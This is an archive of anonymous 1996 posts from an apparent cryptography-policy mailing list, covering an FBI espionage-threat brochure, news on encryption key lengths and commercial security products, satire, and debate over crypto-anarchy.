in a strategy known as the National Security Threat List
(NSTL). The NSTL combines two elements:
*  First, it includes national security threat issues
   regardless of the country of origin.
*  Second, it includes a classified list of foreign
   powers that pose a strategic intelligence threat to
   U.S. security interests.
The issue threat portion of the NSTL was developed in
concert with the U.S. Intelligence Community and key
elements of the U.S. Government. As a result, the FBI
identified seven categories of foreign intelligence
activity that were deemed to be significant threats to U.S. national security interests. The FBI will
investigate the intelligence activities of any country
that are related to any of these seven issues. They are:
1. Proliferation of special weapons of mass destruction
   to include chemical, biological, nuclear, and delivery
   systems of those weapons of mass destruction.
2. Collection of information relating to defense
   establishments and related activities of national
   preparedness.
3. U.S. critical technologies as identified by the
   National Critical Technologies Panel.
4. Targeting of U.S. intelligence and foreign affairs
   information and U.S. Government officials.
5. Collection of U.S. industrial proprietary economic
   information and technology, the loss of which would
   undermine the U.S. strategic industrial position.
6. Clandestine foreign intelligence activity in the
   United States.
7. Perception management and active measures activities.
NATIONAL CRITICAL TECHNOLOGIES
Foreign intelligence activities directed at U.S. critical
technologies are of specific interest to the FBI. These
critical technologies are listed as follows:
   *  Materials:
      +  Materials synthesis and processing
      +  Electronic and photonic materials
      +  Ceramics
      +  Composites
      +  High-performance metals and alloys
   *  Manufacturing:
      +  Flexible computer-integrated manufacturing
      +  Intelligence processing equipment
      +  Micro- and nanofabrication
      +  Systems management technologies
   *  Information and communications:
      +  Software
      +  Micro and optoelectronics
      +  High-performance computing and networking
      +  High-definition imaging and displays
      +  Sensors and signal processing
      +  Data storage and peripherals
      +  Computer simulation and modeling
   *  Biotechnology and life sciences:
      +  Applied molecular biology
      +  Medical technology
   *  Aeronautics and surface transportation:
      +  Aeronautics
      +  Surface transportation technologies
   *  Energy and environment:
      +  Energy technologies
      +  Pollution minimization, remediation, and waste
         management
National Security Begins With You
You may be the target of foreign intelligence activity if
you or your company are associated in any of the critical
technologies listed above. Foreign powers may also seek
to collect U.S. industrial proprietary economic
information and technology, the loss of which would
undermine the U.S. strategic industrial position. Foreign
intelligence collectors target corporate marketing
information in support of their nation's firms. Overseas
travel, foreign contact, and joint ventures may further
increase your exposure to the efforts of foreign
intelligence collectors. If you suspect possible foreign
intelligence activity, or have questions concerning the
National Security Threat List strategy, please contact
the FBI DECA Coordinator at the FBI Field Office nearest
Up to $500,000 Reward for Stopping Espionage
An amendment to title 18 U.S.C. Section 3071, recently
enacted, authorizes the Attorney General to make payment
for information of espionage activity in any country
which leads to the arrest and conviction of any
1. ...for commission of an act of espionage against the
   United States;
2. ...for conspiring or attempting to commit an act of
   espionage against the United States;
3. or which leads to the prevention or frustration of an
   act of espionage against the United States.
Specifics of this amendment can be obtained from any FBI
DECA Coordinator.
FBI Contact Numbers:
To report suspected illegal intelligence or terrorism
activity against the interest of the United States,
telephone the DECA Coordinator at the FBI Field Office
nearest you.
Update Version: 9/25/95

@_date: 1996-02-03 22:14:16
@_author: Anonymous 
@_subject: What is this threat? 
Anonymous questioned the meaning of the FBI-DECA national security threat:
Updated "The Puzzle Palace" will have more on this.
"Perception management" means any method used to conceal
intelligence or counterintelligence -- HUMINT, ELINT,
SIGINT, etc. -- including encryption or other operations
or communication technologies not accessible to, or
comprehensible by, the USG.
"Active measures activities" means any operations, human,
technological or administrative, that threaten the US.
The threat is a catch-all for interference with, or operation against intelligence and counterintelligence, surveillance and counter-surveillance or any other means used by the USG to protect against threats.
Its obscurity is used to cover in general what is not
covered explicitly by the other six well-known threats

@_date: 1996-02-03 23:39:46
@_author: Anonymous 
@_subject: Don't shot till you see the gray of their eyes 
Now I understand it.
That thing on the cover of Applied Crypto is really
one of the Gray's space ships that they use to abduct
aspiring cryptographers and implant microchips in them,
controlling their minds and making them obey RSA's
license agreement.
Very interesting indeed.
On a lighter note, a local NBC station advertised a
special they will have this monday, about the 1-800-INFO-PET
chips... only that parents are opting to have them implanted
in their newborn children.

@_date: 1996-02-04 08:33:35
@_author: Anonymous 
@_subject: Ok Fake E.E.rnst! 
Ho -- bandersnatch is powered up again and transmitting via the pigeon-beshitten attic-lattice of MIT dome!
PCB-swilling frumious, the cronkest of Hasse-heads, 23 years hacking a b.s.e.e.

@_date: 1996-02-05 05:03:36
@_author: Anonymous 
@_subject: Futplex makes the news! 
Duncan Frissell  wrote in "Re: Futplex makes the news!":
"Then there was the time that my RA (Resident Assistant) in my dorm in a
small (private) liberal arts college in the Northwest found out I had a gun
in my room..."
Ah. The only semester I lived on campus, the RA was our roommate, who
just finished doing a round of bong hits with us, then walked around
the hall and busted everyone else who was smoking dope.
It's sad when a noneteen year old kid tries to act like your mother or father.

@_date: 1996-02-06 00:14:32
@_author: Anonymous 
@_subject: Indecent Trash 
I can see it now... about the time that Grandson of Altavista finally yields a URL for Jimmy Hoffa's body in some dump somewhere the government will have figured out that it's so much simpler to catalog the stuff on the way IN, when all the artifacts are fresh and unmixed. While we're all watching what the government does to intercept packets, they will be routing *trash* packets through mysterious "garbage routers."  As the stink grows stronger, someone will conceive of anonymous trash forwarders. They will accept unidentified trash, no questions asked, anonymize it with random DNA and fingerprint whorls, and sneak it into public trash receptacles. DNA generators will enable the mischievous to plant fabricated indications that Hillary did indeed have something going with Vince, the late Khomeini (hey, hard is hard, right?) as well as legions of four-footed friends, confirming the suspicions of As the piles of trash-based data grow, some Senator from
Nebraska will sound the alarm that kids are too easily exposed
to the indecent signs of private behavior retrievable on the
Net and will propose draconian measures to hold everyone
responsible for their contributions to the city landfill. Public receptacles will be closed. Trash will only be collected from registered Identifed Surplus Providers (ISP's). $250,000 fine for disposing of a condom in a dump accessible from the Internet... 10 years in prison for carelessly tossing those nasty Polaroids in the kitchen compactor. The trash of the world
will have to be made safe for kids to view.
Everything will be a lot easier to trace and control if the
garbage input is fully identified. Barcodes on trash bags
might do for starters. Access to the garbage system might have
to be restricted to those 18 and over. Trash collectors could
be made responsible for content, drafting them without pay into
the ranks of the trash police. People could be encouraged to
report suspicious trash, and trash-related activities like
neighbors sneaking out at night to place an innocent-looking
compactor bag down the block with someone else's trash.  For their own protection, youngsters might be required to retain all their garbage until age 18 and then, in a solemn ceremony worthy of the true significance of coming of age, pitch it all (duly anonymized to prevent abuse of minor indiscretions) from their new position as lawful participants in the world garbage system, friends and well-wishers trying to applaud and hold their noses at the same time (try it -- if you're not careful you can break your own nose, but hey, that'll work, too!). Who knows? Maybe Heinlein's advocacy of keeping kids in a barrel and feeding them through a hole until age 18 will enjoy resurgence among the compulsively protective while the Web meanwhile will provide real time underground data on Heinlein's rpm rate.
Protecting the trash of youth will, however, give rise to the hiding of adult trash among that of the underaged. The government
will have to root out offenders and "impute" suspicious trash to the parents. Those with no visible source of trash will of course be suspect, and will have to emit innocent trash to cover themselves. This will give rise to the practice of "trash laundering," in which agents convert nasty trash to innocuous trash that may then be tossed into any monitored, controlled channels with no repercussions.
Trash laundering will become a grave offense to the accompaniment of government and Ad Council PSA's and free brochures from Pueblo, Colorado. Blatant offenders who have fled to foreign climes will be kidnapped, some will be tortured,
because the War Against Filth will be a moral commitment of the national body. Foreign governments headed by suspected trash traffickers will be toppled in quickie invasions, their leaders brought back in chains to disappear into federal dungeons. Public debate will center on the legalities and rationalizations of using the military in policing domestic trash, while agencies such as the FBI cry for more budget to fight the scourge that threatens the decency of the nation's repositories.
Control of trash will spread inevitably to control of liquid wastes, whereupon a terrible discovery will be made: Everyone, but everyone, emits unspeakable bodily products. At that point the government will have no choice but to reluctantly declare everyone an outlaw and execute the populace.
It's all as logical as what happens when you introduce division by zero way down at the bottom of the complex equation where it isn't so noticeable.
We Jurgar Din
(that will have to suffice: I do not yet live in a free country)
+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +

@_date: 1996-02-07 08:48:31
@_author: Anonymous 
@_subject: Strong Crypto Weak 
Strong Encryption Weak, Say Crypto Gurus
Washington, D.C., U.S.A., 6 February 1996 -- Strong
encryption is weak, reports a group of prominent
cryptographers and computer scientists. Their report,
released yesterday, is expected to play an important role
in coming debates over US policy on exports of software
that includes encryption capabilities. Current US policy generally limits exports to encryption
using 40-bit keys. On a case-by-case basis, the US has
allowed export of software with 56-bit digital encryption
standard (DES) encryption. Recently, two French graduate students cracked the 40-bit
encryption Netscape was using. The trick took several
days, using idle time on the school's computers. The seven experts who wrote the new paper -- "Minimal Key
Lengths for Symmetric Ciphers to Provide Adequate
Commercial Security" -- say the achievement by the
students at the Ecole Polytechnique was trivial. "Anyone with a modicum of computer expertise and a few
hundred dollars would be able to attack 40-bit encryption
much faster," they write. They add that using a field
programmable gate array (FPGA) chip, costing about $400
mounted on a card, "would on average recover a 40-bit key
in five hours."
"A more determined commercial predator," says the paper, "prepared to spend $10,000 for a set-up" using 25 FPGA
chips, "can find 40-bit keys in an average of 12
Moving to a 56-bit DES system doesn't solve the problem,
says the paper. "Calculations show that DES is inadequate
against a corporate or government attacker committing
serious resources. The bottom line is that DES is cheaper
and easier to break than many believe." And it is getting easier to crack DES code, says the
paper. "At present, it would take a year and a half for
someone using $10,000 worth of FPGA technology to search
out a DES key. In ten years time, an investment of this
size would allow one to find a DES key in less than a
A serious attack against DES, on the order of $300,000,
"could find a DES key in an average of 19 days using
off-the-shelf technology and in only three hours using a
custom developed chip," say the cryptoanalysts. That's
the sort of money a business, or a criminal organization,
might be willing to spend to find trade secrets or dip
into a flow of financial transactions. A government intelligence agency willing to spend $300
million "could recover DES keys in 12 seconds each," says
the paper. "The investment required is large, but not
unheard of in the intelligence community. It is less than
the cost of the Glomar Explorer, built to salvage a
single Russian submarine, and far less than the cost of
many spy satellites."
What's the proper key length for protection against
criminal operations or a prying government? The analysts
"strongly recommend a minimum key-length of 90 bits for
symmetric cryptosystems." That's far stronger than
anything the US government has ever contemplated allowing
for export.
The paper was written by some of the most prestigious  individuals in the field: Matt Blaze, Whitfield Diffie,
Ronald Rivest, Bruce Schneier, Tsutomu Shimomura, Eric
Thompson, and Michael Wiener. Blaze, at AT&T Research, recently demonstrated weaknesses
in the government's "Clipper Chip" key escrow system.
Diffie, at Sun Microsystems, was a co-creator of public
key cryptography. Rivest, at MIT, was one of the
inventors of the RSA public-key system and one of the
founders of RSA Data Security Inc.
Schneier, president of Counterpane Systems, is the author
of a leading textbook, Applied Cryptography. Shimomura,
at the San Diego Supercomputer Center, last year tracked
down outlaw hacker Kevin Mitnick. Thompson heads AccessData's crypto team, which has
regular clients that include the FBI and other law
enforcement agencies. Wiener, at Bell-Northern Research,
wrote an influential 1993 article, "Efficient DES Key
Search," which describes how to build a machine to attack
DES by brute computational force.
The paper grew out of a one-day meeting in Chicago last November, which was supported by the Business Software
Alliance. The paper is available on the BSA World Wide
Web site,

@_date: 1996-02-07 09:14:14
@_author: Anonymous 
@_subject: Fax Fools US Espionage 
"Foolproof" Encrypted Fax System
Derby, England, 6 February 1996 -- Wordcraft, the
Derby-based software house, has announced that its
proposals for a "foolproof" secure fax transmission
system will be considered by the International
Telecommunications Union's meeting in Geneva,
Switzerland, next week. According to Mike Lake, the company's managing director,
Wordcraft has been working closely with a number of other
companies, notably Chantilly (another UK firm) on the
proposals, which will be considered alongside a competing
set from French and German companies.
Lake told Newsbytes that the Wordcraft system is known as
Automatic Fax Services (AFS) and consists of four
elements: authentication, message confirmation,
integrated encryption, and a certificate of receipt. The authentication element of AFS revolves the generation
of the fax device's serial number and unique transaction
number for each fax transmission. Message confirmation is
generated by the distant fax device, while the
certificate of receipt is printed after confirmation is received.
"Existing fax transmission reports are just that -- a
note of transmission. AGS creates a new document, a
certificate of receipt, which proves that a fax was
transmitted," Lake said.
The encryption system, meanwhile, uses a proprietary, but
open systems standard of encryption, using a one-time
passkey, which is transmitted by the sending fax device
in a secure manner.
"This contrasts with the French/German system which is
based on RSA's private and public key system. That system
is flawed, since it relies on the US Government licensing
a manufacturer to use the algorithm, something that the
Government is unlikely to do with, for example, a
Japanese fax manufacturer," Lake explained.
According to Lake, even if the ITU Study Group 8 approves
the French/German secure fax system next week, no major
fax vendor is likely to implement such a system on their
fax machines if the US Government is allowed to licence
each fax machine for use.
"The AFS system is secure, yet does not need the
permission of anybody to use it. In that sense, it's a
more global system," he said.
So what does Wordcraft get out of the proposed standard?
According to Lake, the company is offering a series of C
language routines for inclusion in the firmware of fax
machines, and fax software drivers. These routines, he
said, allow driver programs to be coded very easily. It
is the modest licence fees for this software with which Wordcraft is hoping to recoup its investment.

@_date: 1996-02-07 18:45:54
@_author: Anonymous 
@_subject: GE's Transaction Tech 
GE Info Services Launches New Transaction Technology Rockville, Md., 6 February 1996 -- General Electric's  GE Information Services division said it is launching a
new set of hardware and software products that will
protect business transactions over the Internet. One of
the features of the new system, called "GE
InterBusiness," involves using one-time use encryption
codes for each online session. The new offering combines the one-time, or dynamic,
encrypted session key, mutual authentication, and
advanced firewall technology, officials said. By using
standard Internet protocols, a user can conduct
electronic data interchange, electronic messaging, and
electronic file transfers via a secure "pipeline." Those
three elements are key in both electronic commerce and GE
Information Services' Business Productivity solutions.
Anne Biehl, manager of market development for GE
Information Services, said one of the key differentiators
between her company's secure business transaction
technology and offerings from other companies lies with
the dynamic encrypted session key. "This is the first
system on the market today, that we know of, that's using
(this technology)," she said. "It's a pretty powerful
'ring of security' for our users. It's a nice feature
we've integrated into our total solution." With the
dynamic session key, the session is encrypted to secure
all information passed from sender to receiver. The key
itself is never seen on the Internet, and hackers can't
break the encryption, officials stressed.
The new system uses the standard networking and
connectivity of the Internet to interface with systems
used by GE's 40,000-plus customer companies, officials
said. GE InterBusiness runs on all browsers, resides on
any Internet-compatible desktop, and interacts with
standard Internet applications.
GE InterBusiness is available now, Biehl said. Pricing
varies depending on the client's requirements, she said.
Biehl said today's announcement has nothing to do with
the completed sale of the group's GEnie online service to
Queens, New York-based Yovelle Renaissance Corporation,
reported last month.
For additional information, those with Internet World
Wide Web access can surf to GE Information Services' Web
site at

@_date: 1996-02-07 18:50:57
@_author: Anonymous 
@_subject: ATT Waives Fraud Fee 
AT&T WorldNet Spurs Online Credit Use
Bridgewater, NJ, 6 February 1996 -- In a teleconference
today, officials of AT&T's WorldNet and Universal Card
services announced a program aimed at allowing users to
"feel safe" in making online transactions by waiving the
standard $50 deductible fee on the use of credit cards
for "fraudulent" purposes.
The new program, to begin within eight weeks, will apply
to all dial-up customers of both WorldNet and Universal
Card Services, as well as to corporate users of
WorldNet's LAN (local area network) Service who use their
Universal Cards upon registering for WorldNet, said Tom
Evslin, VP of AT&T Gateway Services, speaking during the
Some $200 billion in sales were conducted over AT&T's 800
numbers last year, in comparison to only $500 million in
sales over the Internet, Evslin pointed out.
"Secure credit card" technology is an important
ingredient in spurring more electronic commerce, the VP
acknowledged, noting that AT&T is one of the partners in
the new SET (Secure Electronic Transactions) alliance
unveiled by Mastercard and Visa last week.
But based on the results of studies conducted by AT&T
among consumers, it is just as important that consumers
"feel safe" in doing business online as that they "be
safe," Evslin told the reporters and analysts. "What's important to consumers is that AT&T put its money
where its mouth is, rather than ask consumers to take the
risk," the VP asserted. AT&T will launch the new "deductible fee waiver" in
conjunction with the availability of dial-up access to
WorldNet, a new Internet "content aggregation" service
now in beta, by the end of this quarter, according to
Evslin. AT&T rolled out the WorldNet LAN Connectivity
Service together with BBN Planet last fall.
AT&T plans to be "aggressive" in promoting WorldNet in
the US and overseas, though mechanisms that will include
cross-marketing programs with AT&T Universal Card Service
as well as with third-party partners such as Netscape,
Verity, McKinley, and as of last week, Broderbund, he
told the press.
AT&T Universal Card now has more US card holders than any
other credit card, according to Evslin. The AT&T also
told reporters that he expects other credit card
companies will follow AT&T's lead in suspending the $50
deductible charge in online transactions.

@_date: 1996-02-07 18:51:33
@_author: Anonymous 
@_subject: GTE's Virtual CA 
GTE's CyberTrust For Web Electronic Commerce
Washington, D.C., 6 February 1996 -- GTE officials say
that the company's new CyberTrust electronic commerce
program will allow companies for the first time to handle
most of the CA (Certification Authority) function by
themselves, by means of secure Web servers. At the Comnet press conference, reporters were told that
GTE, a partner of both Mastercard and Visa, will
introduce its new "Virtual CA" capability for Webmasters
in conjunction with a trio of related services.
The four new services from GTE are aimed at financial  institutions, online merchants, and government agencies,
as well as at the corporate and consumer markets, said
Charles S. Walton, Jr., CyberTrust's program director,
speaking at the Comnet press event. One component of CyberTrust, called the Electronic
Commerce Service, will provide an "infrastructure" for
credit card companies using new secure payment standards
for online transactions, Walton added. Another new service, the Partner Forum, will provide
online test services and tech support for developers and
integrators in the electronic commerce arena. Through GTE's new Cybersign service, GTE will directly
handle the maintenance of public key certificates, as
well as the issuance, renewal, and revocation of these
But with Virtual CA, GTE will manage certificate
management only, permitting Webmasters at subscribing
companies to do their own issuance, renewal, and
revocation of certificates.
Walton acknowledged that GTE's new suite of services will
be targeted at the same market now dominated by Verisign.
But the GTE services, he maintained, will be
differentiated on the basis of general "operational
environment," as well as by Virtual CA. In a follow-up interview later, Walton said that GTE, a
long-time consultant to Mastercard, began working with
both Mastercard and Visa last November on development of
SET (Secure Electronic Transactions), a new joint
standard for online credit card transactions. GTE, he added, hosted both Mastercard and Visa last week
at GTE headquarters in Needham, Massachusetts. Aside from
GTE, Mastercard and Visa, other partners in the SET
effort include Verisign, IBM, Microsoft, Netscape, SAIC,
and Terisa Systems.
GTE had previously helped Mastercard to create the SEPP
standard, according to Walton. GTE's new CyberTrust,
first announced as supporting SEPP, will now support its
"successor," SET, he noted. CyberTrust will also comply
with the SSL protocol for Web security.
During the press event at Comnet, Walton reported that
Cybersign and Virtual CA will implement a "dual card,
split RSA key design," with "strong access controls." The
two systems will use PCMCIA cryptographic hardware token
technology and X.509-certificate-compatible software.
Virtual CA, he continued, will initially be available on
Sun Solaris-based secure Web servers, but will be ported
to Windows NT-based secure Web servers by the end of
1996. End users will be able to access Virtual CA through
Netscape browsers.
The Web server-based service will introduce "verification
at the server level, which is really where you want it to
be," asserted the GTE official. On-site Webmasters are in a particularly good position to
confirm that users "are who they say they are," the
journalists were told. As a result, Virtual CA will use a technique called "pre-
verification," in which the Webmaster, or RA
(Registration Authority), will validate and approve
users' certificate requests before the requests go to
CyberTrust. CyberTrust will then return a certificate for
the end user, in the form of an algorithm, either direct
to the end user or through the RA.
Companies subscribing to Virtual CA will receive custom
home pages for certificate data entry, and for issuing,
renewing, and revoking certificates, Walton said. The CyberTrust program director said that the  special PCMCIA hardware will be used at the "CA level"
only, and will not be required by either end users or
No "actual cards" will be issued to, or needed by either
group, he added. GTE plans to begin offering both Virtual
CA and Cybersign in the second quarter.

@_date: 1996-02-08 11:36:01
@_author: Anonymous 
@_subject: personal web proxy? 
Does anyone know whether there's a freely available web proxy available
anywhere? Even a "personal" one somewhere on my ISP's UNIX box would be a
simple way to beat superficial logging/resolution of my static IP.
Something like the Nutscapify or Canadianizer proxies, minus all the
blinking and "hoser, eh?" stuff.

@_date: 1996-02-09 23:27:03
@_author: Anonymous 
@_subject: Tsu.con Rishabed 
WSJ, 9 Feb 1996
Shimomura, Pursuer of Hackers, Finds Himself Homeless on
By Jared Sandberg
A renowned hacker catcher who co-wrote the book
"Takedown" just got a bit of a takedown himself.
Tsutomu Shimomura, the Internet security expert credited
with catching fugitive hacker Kevin Mitnick last year,
set up a site on the Internet's World Wide Web to
chronicle the famous cat-and-mouse chase. To supplement
the book, the on-line database includes audio clips of
taunting messages Mr. Mitnick left for Mr. Shimomura and
transcripts of chat sessions that the hacker held with
friends, under the heading "Kevin On Demand."
But over the weekend, the address of the Web site,
"takedown.com," was deleted at a hacker's request and
replaced with a bogus entry, "takendown.com."
Not exactly hilarious, but this is hacker humor.
"It's pretty juvenile," said Mr. Shimomura, who got his
address back by Wednesday night. But he notes that
hackers could easily change the Internet addresses of
corporations or even America Online Inc. "I expect that
businesses like AOL would be much less amused if they
were renamed 'aohell.com,' and that would cost them real
The problem arose when Network Solutions Inc., the
company that sets up addresses on the Internet, was
apparently conned by someone claiming to be Mr.
Shimomura. A company official said that he hadn't been
able to investigate the matter because the company has
been deluged with electronic mail in an unrelated prank.
But many experts are concerned that Network Solutions
doesn't verify the authenticity of Internet address
requests, which number as many as 3,000 a day, and that
the company simply takes people at their word.
"They do it all the time, and they shouldn't," said
Steven Bellovin, a security expert at AT&T Corp.'s
research unit, who fears such dupes will grow more
common. Mr. Bellovin noted that hackers have also
exchanged software tools that can redirect users to phony
sites. "Hackers share tools better than the good guys,"
he said.
Network Solutions is working on a tool to check the
authenticity of requests for address changes. But some
think that such moves are a little late.
Mr. Shimomura said, "Unfortunately, we live in a world
where things need to break before they're fixed."

@_date: 1996-02-10 10:56:31
@_author: Anonymous 
@_subject: IBM, RSA Security 
More On IBM's Internet SecureWay Security Plans
London, 9 February 1996 -- IBM UK has revealed a little
more of the detail surrounding its deal with RSA Data
Security for the Big Blue range of SecureWay Internet
security products and services.
According to Kathy Kincaid, director of IT (information
security) programs with Big Blue, the idea behind the
development project is to develop a set of open
cryptography standards for the Internet and other
networks, so supporting secure electronic commerce.
Both companies plan to develop interoperable security
across IBM products and other vendor platforms. According
to IBM, their efforts will provide customers and
developers with safe universal access to the Internet,
consistent with US and non-US export regulations
governing cryptographic products.
The linkup between the two companies, Kincaid explained,
will allow them to modify RSA's BSAFE encryption engine
and Big Blue's Common Cryptographic Architecture (CCA)
for interoperability between RSA's toolkits and IBM's
CCA-based hardware systems.
"The complementary skills, technology and experience of
IBM and RSA will greatly benefit our customers and the
security industry," Kincaid said, adding that both
companies have been testing interoperability across a
series of virtual private networks (VPNs).
Jim Bidzos, RSA's CEO, claims that the deal will involve
several levels of close cooperation between RSA and Big
Blue, with staff at RSA's labs working with IBM's crypto
researchers at its T J Watson facility to produce "more
efficient and secure commercial cryptography.
"In addition, there will be close cooperation on the
development of protocols and interfaces. The result
should be trusted, seamless, interoperable security
across not only the IBM product line, but across vendor
products as well, when the resulting technology is
adopted by both RSA and IBM's large customer vase," he
In parallel with the launch of the SecureWay range of
Internet products and services, IBM's Internet decision
has agreed to begin an internal pilot test of RSA Secure,
RSA's disk and file encryption technology, which includes
a facility for emergency key access.
Further details of IBM's SecureWay range of Internet
products and services can be found on Big Blue's World
Wide Web ages, at  . According to IBM,
its security products support the security component of
the Open Blueprint. A white paper on security in the Open
Blueprint is available from IBM's Canada's test lab Web
pages at
 . IBM & RSA Develop "SecureWay" Internet Products
London, 8 February 1996 -- IBM and RSA Data Security have teamed up to develop open cryptography systems for the
Internet and other networks. Thanks to the linkup, IBM
plans to ship a whole range of Internet security products
to tie in with its existing range of Internet services,
over the next few months.
Anna Russell, a spokesperson for IBM's UK and European
operations, said that the RSA technology and products
deal applies worldwide, with the resultant security
products expected to dovetail in with Big Blue's existing
range of Internet services for businesses, end users, and
major corporations.
The whole ensemble of services, hardware and software,
will be banded together under the umbrella name of
SecureWay, a name that Russell claims will get the
message across to potential users that the IBM portfolio
covers many different aspects of computer networking.
"The SecureWay products and services will be offered
throughout IBM channels, ranging from dealers, right
through to value-added resellers. The SecureWay range
will be offered through all channels on a global basis,"
she explained.
According to Russell, the SecureWay range include access
controls, cryptographic hardware and software for the IBM
server series, smart cards and readers, gateway
firewalls, single logon security admin systems,
anti-virus software, distributed security management,
directory and security services for network servers, and
Internet browsers and servers, as well as secured
Kathy Kincaid, director of IBM's information technology
(IT) security programs in the UK and Europe, explained
that the SecureWay product range will include an
emergency response service, "ethical hacking" by Big
Blue's global security analysis labs, and turnkey
firewall installation services. ...

@_date: 1996-02-11 15:45:35
@_author: Anonymous 
@_subject: Building in Big Brother 
Building in Big Brother:
   The Cryptographic Policy Debate
   Edited by Lance J. Hoffman
   Springer Verlag Publishers
   Copyright: March 1995
   Price:$29.95
   ISBN 0-387-94441-9
   "If you ever wondered how a particular computer technology could attract the interest of the directors of three intelligence agencies, the heavyweights in the computer industry, a gang of programmers turned freedom fighters, and the President of the United States, you need look no farther than Building in Big Brother. This book outlines the next civil liberties battle in the United States."
   - Marc Rotenberg, Electronic Privacy Information Center
   "One-stop-shopping for even the most sophisticated analyst of the policy wars over cryptography."
   - A. Michael Froomkin, Associate Professor of Law, University of Miami Law School
   "Lance Hoffman has compiled an extraordinarily useful and well balanced collection of materials on cryptography and its applications. This book will instantly become a definitive    - Peter G. Neumann
   "Though Lance Hoffman is a dedicated opponent of current government policy, he has assembled a volume that should be -- and will be -- on the desk of every cryptographic policymaker in Washington. He has accurately recorded the many voices in a debate that will profoundly affect our future, for good or ill, well into the twenty-first century. This book is an important contribution to the history of encryption. It is an even more important contribution to those who are struggling to shape that history."
   - Stewart Baker, Steptoe & Johnson (formerly General Counsel to the National Security Agency)
   "An authoritative source of political writings by the major players in the crypto revolution."
   - Philip Zimmermann, Creator of PGP
   Includes Steven Levy's peerless "Cypherpunks vs Uncle Sam" and other Shortstop-proof cpunx ammunitions.

@_date: 1996-02-12 21:15:55
@_author: Anonymous 
@_subject: No Subject 
merriman at arn.net ("David K. Merriman") asks:
site.  Please
Thanks to SMTP not anymore I'd hope.
Noise will be noise.

@_date: 1996-02-13 14:46:23
@_author: Anonymous 
@_subject: DEA 
Column by Jim Dykes in the Knoxville Journal (423-584-9606), 2/8/96.
(...) I had a call the other day.  About the DEA.  Try to keep
all these damn acronyms straight:  DEA is Drug Enforcement
Call was from an old cowboy - well, former Air America pilot, to
be more precise, CIA.  (There should be a federal agency to
control us old men better.)
To make a long, long story short, I have some names and phone
numbers of people around the country - Customs, Immigration &
Naturalization, maybe even some DEA, who can discuss rather
interesting money ripoff techniques by DEA agents involving Title
18, Title 21, and Title 19 of the Federal Code.  There was a time
when I would have busted a gut - and a phone budget - trying to
snare some bent government agents.  But, now ...
Let me make it perfectly clear that this old persimmon really
doesn't give a damn.  I am long past being shocked at venality
and corruption in public servants.  But, if anybody wants to be a
hotshot investigative reporter (and run up a helluva phone bill
for his or her employer) just give me a call.  (That lets a lot
of you out, since it would have to be somebody I know and trust.)

@_date: 1996-02-14 00:40:17
@_author: Anonymous 
@_subject: Why There Exists No Middle Ground in the Crypto-policy Debate 
Why There Exists No Middle Ground in the Crypto-policy Debate
[This message only appears to be posted anonymously, if you
 have the correct tools, you can learn my name and e-address.
 Take that auto-WWW indexers!]
Decius  recently presented an essay,
entitled ``Crypto-Absolutism,'' which described ``Why and how the
middle ground should be found in the crypto-policy debate.''  The
essay is clearly wrong in its assumptions and thus its conclusions.
Given the perceived flaws in the assumptions, his commentary must be
Within the context of this rebuttal, ``T-Camp Cypherpunks'' are those
``Cypherpunks'' (whatever they are :-) that follow a technology
evolution-based line of reasoning to arrive at the inevitable coming
of crypto-anarchy.  As well, ``A-Camp Cypherpunks'' are those that
advocate crypto-anarchy because they like the social and political
implications.  It is possible to be an A-Camp Cypherpunk or a T-Camp
Cypherpunk without being the other.  Of course, it is quite possible
to be both.  It has often been said on Cypherpunks, that ``we'' are
not a ``we''.  Decius falls into a trap by assuming that all
Cypherpunks are in the A-Camp.  This mistake colors the entire essay.
The main problem with Decius' essay is that it assumes that
Cypherpunks _merely_ advocate crypto-anarchy.  In fact, T-Camp
Cypherpunks do not stop at this puny point.  They observe that
crypto-anarchy is the _likely_ _outcome_ of the current technology
trend (this trend is discussed below).  Note that this observation of
fulfillment, if correct, is a far stronger statement than merely
advocating that crypto-anarchy should happen or would be a really good
A-Camp Cypherpunks also advocate that this trend should be exploited
to its conclusion, sooner rather than later, to preempt any massive
government crackdowns that would only prolong the transition pains.
The rationale being that these supposed government crackdowns have no
place in the natural evolution of a free society.  And that the
continuance of a free society is preferable to that of a move towards
a police state, which would be required to facilitate the useless ---
in the end --- crackdown on this information technology.
Decius is also wrong when he states that crypto-anarchy means people
will never again be accountable or recognized (pure A-Campers might
like this to be true, although I doubt it).  In the T-Camper's view,
crypto-anarchy means that people have the choice of when they wish to
be accountable and recognized for their statements and information
movement-related actions and when they wish otherwise.  People are not
forced under the crypto-anarchy model to be unaccountable or
unrecognizable.  Likewise, the crypto-anarchy model allows people to
ignore those that are unaccountable and unrecognizable, if they wish.
Decius fails to recognize that people could be recognized, and even
paid, for example, when operating under a pseudonym instead of
completely anonymously (this concept links two Cypherpunks favorites:
untraceable anonymous e-cash and anonymous reputations).
As primary counter-points to Decius on this issue:
- - The people who wrote the Federalists' Papers did so anonymously,
  yet I suspect that all were well-known and transacted business and
  other politics under their ``real names'' most of the time.
- - Individual articles are anonymously published in the _The Economist_
  yet I suspect that people are being paid to contribute information
  to this newspaper (at least, I know I am paying a lot per year, for
  a newspaper, to get the information :-).
- - The recently released ``Primary Colors'' book by Anonymous.  Yet
  this person, if the publisher is to be believed, is well-known to
  President Clinton (I think it may all just be a good marketing scam :-).
Back to the main point of unstoppable --- in a free society, at least

@_date: 1996-02-15 18:18:55
@_author: Anonymous 
@_subject: Error Condition Re: UNSCRIBING 
Responding to msg by lharrison at mhv.net ("Lynne L. Harrison") on Wed, 14 Feb 10:12 AM
remarks I don't give
Yeah, place your bet that Tim writes these trolls and answers them, pumping the conversation, fostering coy controversies. Smart guy, bores easily, likes to lure the rubes, he says. Toy with them, spout outrageous remarks, act indiginant when they are challenged, feign hurt, let suckers defend him.
Sometimes mimics Rimm, may impersonate him, too, or coach Marty, who knows? He's got lots of Net personas, seldom non grata. He's a vintage infotainer, California dreaming, an export techno-wine of the region.
Avid Rube

@_date: 1996-02-15 22:58:38
@_author: Anonymous 
@_subject: No Subject 
Something for Jim Bell and his ilk to think about:
         "If we could climb
               the highest steeple
          And look around at
               all the people,
          And shoot the ones
               not wholly good
          As we, like noble
               shooters, should,
          Why, then there'd be
               an only worry ---
          Who would be left
               to bury                  us?"
                 - Walt Kelly

@_date: 1996-02-16 01:50:04
@_author: Anonymous 
@_subject: National Cryptologic Museum (Noise) 
I peeled this off of Usenet, Wondering if this is Tim doing a little trolling?
The Christmas Troll
